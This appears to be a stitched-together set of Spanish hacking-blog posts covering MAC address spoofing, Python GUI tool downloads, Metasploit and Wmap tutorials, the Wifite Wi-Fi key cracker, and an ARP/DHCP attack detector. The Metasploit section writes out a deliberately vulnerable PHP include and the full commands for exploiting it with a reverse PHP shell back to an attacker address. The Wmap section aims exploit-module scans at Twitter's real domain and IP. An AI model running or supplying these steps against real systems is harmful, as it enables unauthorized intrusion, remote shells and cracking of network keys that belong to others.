Clonar MAC Address Existen muchos procedimientos para cambiar la MAC Address de una PC. Pasare a explicar uno muy sencillo. Primero que nada necesitaremos el EtherChange Descarga oficial: Mirror: Ahora se procede a ejecutar el programa, y tendremos algo asi: 1. Seleccionamos el adaptador de red correspondiente (placa de red). 2. Tipeamos “1? para especificar una nueva dirección ethernet, o sea MAC Address. 3. Escribimos la nueva MAC Addres sin comas, guiones o cualquier tipo de separadores. Listo! Ahora solo resta reiniciar el ordenador para habilitar la nueva MAC Address. Ahora procedere a explicar otra alternativa. 1. Vamos al [Panel de Control] de Windows –> [Conexiones de red]. 2. Hacemos doble click en nuestra conexión (usualmente llamada “Conexión de red de área local …”) . 3. Click en Propiedades y luego en Configurar 4 Luego vamos a la pestaña Avanzada u Opciones Avanzadas. 5 Dentro de la pestaña buscamos el campo “Network Address” y especificamos el valor hexadecimal que tendrá como dirección MAC nuestra placa. El problema de este último método es que no todas las placas de red nos permiten modificar el MAC Address
Boa Constructor 0.6.1 beta Boa Constructor es un IDE de Python y un constructor de GUI para wxPython. Esta version necesita tener instalado wxPython 2.5.X. http://sourceforge.net/project/downloading.php?groupname=boa-constructor&filename=boa-constructor-0.6.1.bin.setup.exe&use_mirror=ufpr PythonCard 0.8.2 PythonCard es una herramienta para la construccion de interfaces graficas en Python que utiliza wxPython. http://sourceforge.net/project/downloading.php?groupname=pythoncard&filename=PythonCard-0.8.2.win32.exe&use_mirror=ufpr VisualWx 0.87.6.0 VisualWx es una herramienta RAD diseñada para python y otros lenguajes de programación. Antes de instalar VisualWX, se necesita tener instalado tanto Python como wxPython (es compatible con wxPython 2.6.1). Todavia se encuentra en fase de desarrollo. http://visualwx.altervista.org/VisualWx_087-60.exe wxGlade 0.6.1 wxGlade es un diseñador de interfaces graficas que permite crear interfaces en wxWidgets/wxPython. Puede generar codigo para Python, C++ y XRC. http://sourceforge.net/project/downloading.php?groupname=wxglade&filename=wxGlade-0.6.1-setup.exe&use_mirror=ufpr wxPython 2.8.7.1 (py 2.4) wxPython es un juego de herramientas GUI para Python, que permiten crear aplicaciones con interfaces graficas. Funciona como un modulo de extension que encapsula la biblioteca grafica wxWidgets. Esta version es para Python 2.4. http://sourceforge.net/project/downloading.php?groupname=wxpython&filename=wxPython2.8-win32-unicode-2.8.7.1-py24.exe&use_mirror=ufpr wxPython 2.8.7.1 (py 2.5) wxPython es un juego de herramientas GUI para Python, que permiten crear aplicaciones con interfaces graficas. Funciona como un modulo de extension que encapsula la biblioteca grafica wxWidgets. Esta version es para Python 2.5. http://sourceforge.net/project/downloading.php?groupname=wxpython&filename=wxPython2.8-win32-unicode-2.8.7.1-py25.exe&use_mirror=ufpr wxPython 2.8.7.1 docs Documentacion, ejemplos y demos de wxPython 2.8.7.1. http://sourceforge.net/project/downloading.php?groupname=wxpython&filename=wxPython2.8-win32-docs-demos-2.8.7.1.exe&use_mirror=ufpr TKINTER TkInter (de TK Interface) es un módulo que nos permite construir interfaces gráficas de usuario multiplataforma en Python utilizando el conocido toolkit Tk. Python incluye este módulo por defecto, lo que hace que sea un tookit muy popular. TkInter, además, es robusto, maduro y muy sencillo de aprender y de utilizar, contando con una amplia documentación. http://tkinter.unpythonic.net/wiki/ PyGTK Cuenta con una API muy clara, limpia y elegante y es, además, muy sencillo de aprender, solo superado en ese aspecto por Tkinter. PyGTK también cuenta con grandes herramientas para construir la interfaz de forma gráfica, como Glade o Gazpacho. http://www.pygtk.org/ PyQT El binding de Qt para Python, es especialmente orientado para el desarrollo en KDE, dado que Qt es la librería utilizada para crear este entorno. http://www.riverbankcomputing.co.uk/software/pyqt/
Una muestra más de que Metasploit sirve para explotar cualquier tipo de vulnerabilidad está aquí, un módulo de Metasploit para explotar RFIs.RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().link: http://www.youtube.com/watch?v=u6F-O32BR_Y&feature=player_embeddedLo primero es simplemente ir a la carpeta /var/www/html para editar el archivo index.php:cd /var/www/html mkdir 1 vi 1/index.phpSe agrega al archivo index.php el pedazo de código vulnerable:<?php $color='blue'; if (isset($_GET['COLOR'])) $color = $_GET['COLOR']; require($color.'.php'); ?>O también puede ser este:<?php $color = 'blue'; if (isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; include( $color . '.php' ); ?>De aquí en adelante pongo el comando y al lado entre corchetes [] la explicación:chown apache:apache -R 1 [Cambia el propietario del fichero "1" al servicio Apache] msfconsole [Echa a andar la consola de MSF] use unix/webapp/php_include [Exploit que se va usar] set PATH/1/ [El Path, subdominio o carpeta donde esta la Uri] set PHPURI /index.php?COLOR=XXpathXX [Se define la Uri vulnerable y la variable donde se explota (XXpathXX)] set RHOST localhost [IP o host del objetivo] set PAYLOAD php/reverse_php [Elegimos un Payload] set LHOST 172.16.61.132 [IP donde se conectará la víctima] exploit [Echa a andar el exploit] dir [Mira archivos en el directorio] touch test.txt [Crea un archivo llamado test.txt] echo Owned > test.txt [Escribe Owned dentro de test.txt]
Wmap es un framework para ejecutar escaneos contra aplicaciones Web, diseñado para ser utilizado como un plugin de MetaSploit Framework, cuenta con una arquitectura simple y no obstante sumamente potente en comparación con otras alternativas open source o comerciales que se encuentran actualmente en el mercado, la simplicidad de este plugin radica en que no depende de ningún navegador web o motor de búsqueda para capturar datos y manipularlos. Las librerías que se deben instalar antes de proceder con la ejecución del plugin en un sistema Debian/Ubuntu son: sudo apt-get install libxml-ruby sudo apt-get install libxml2-dev sudo apt-get install libxslt-dev sudo apt-get install libnokogiri-ruby gem install libxslt-ruby gem install msgpack PostgreSQL Lo primero que haremos será crear una nueva base de datos para almacenar los resultados de análicis. stuxnet@stuxnet:~$ sudo su postgres password for stuxnet: postgres@stuxnet:/home/stuxnet$ createuser metasploit -P Enter password for new role: Enter it again: Shall the new role be a superuser? (y/n) y postgres@stuxnet:/home/stuxnet$ createdb --owner=metasploit metasploit Luego en una terminal iniciamos: sudo /etc/init.d/./postgresql start Luego de haber creado la base de datos abriremos una consola del metasploit y tecleamos. msf > db_connect metasploit:[email protected]:5432/metasploit Donde: User: metasploit ( reemplazar por su user ) Passwd: metasploit ( reemplazar por su password ) Luego de haber creado la base de datos cargaremos WMAP. msf > load wmap Una vez realizado esto vamos añadir una nueva el target (sitio) seguido de la IP. msf > wmap_sites -a www.twitter.com,199.59.148.10 Luego comprobramos si fue agregado correctamente. msf > wmap_sites -l Luego procedemos a covertirlo a objetivo ( Target ) msf > wmap_sites -s 0 1 msf > wmap_targets -t www.twitter.com,199.59.148.10 msf > set DOMIAN www.twitter.com msf > wmap_targets -l Luego procedemos a lanzar los módulos de explotacion que serán cargados. msf > msf > wmap_run -t Una vez cargados los módulos procedemos a lanzarlos al sitio de destino para realizar el test de seguridad. msf > wmap_run -e Una vez que toda la exploracion termine vamos a comprobar si encontramos alguna vulnerabilidad. msf > hosts -c address,svcs,vulns
Wifite es creado para atacar a varios cifrados WEP y WPA de redes al mismo tiempo. Esta herramienta se puede personalizar para ser automatizada con sólo unos pocos argumentos y se puede confiar para funcionar sin supervisión. Características: * Clases por el poder de las metas (en dB); más grietas puntos de acceso primero. * Todos los apretones de manos son una copia de seguridad WPA (para wifite.py 's directorio de trabajo) * Opciones de mediados de ataque: parada durante el ataque con Ctrl C para utilizar (continuar, pasar al siguiente objetivo, pase a la ruptura, salida) * Numerosos filtros para especificar exactamente qué ataque (WEP / WPA / tanto, por encima de ciertos puntos fuertes de la señal, canales, etc) * Muy ajustes personalizables (tiempos de espera, los paquetes / seg, etc) * Apoyo SKA (no probado) * Encuentra dispositivos en modo monitor, si no se encuentra ninguno, le pide para la selección * Todas las contraseñas guardadas para log.txt * Conmutación ataques WEP no restablece IVS * Muestra resumen de la sesión en la salida; muestra las claves del agrietado. Wifite - Crackeador De Claves WEP/WPA Stuxnethack
Esta herramienta nos ayuda a detectar ataques ARP poisoning y ataques DHCP ACK Injection. funciona esnifando los paquetes de la interfaz de red seleccionada y analizando aquellos paquetes bien sean ARP o DHCP en busca de posibles ataques MITM. Cuando detecta un ataque muestra una alerta y la información del atacante. La herramienta permite varias configuraciones, pudiendo elegir los tipos de ataques que se desean detectar, si se desea que se mitiguen los ataques ARP Poisoning, así cómo la posibilidad de iniciar Marmita con Windows - algo que os recomendamos si vais de red en red. En la ventana principal además existen distintos paneles con información sobre ARP y DHCP así como todos los logs. Descarga Stuxnethack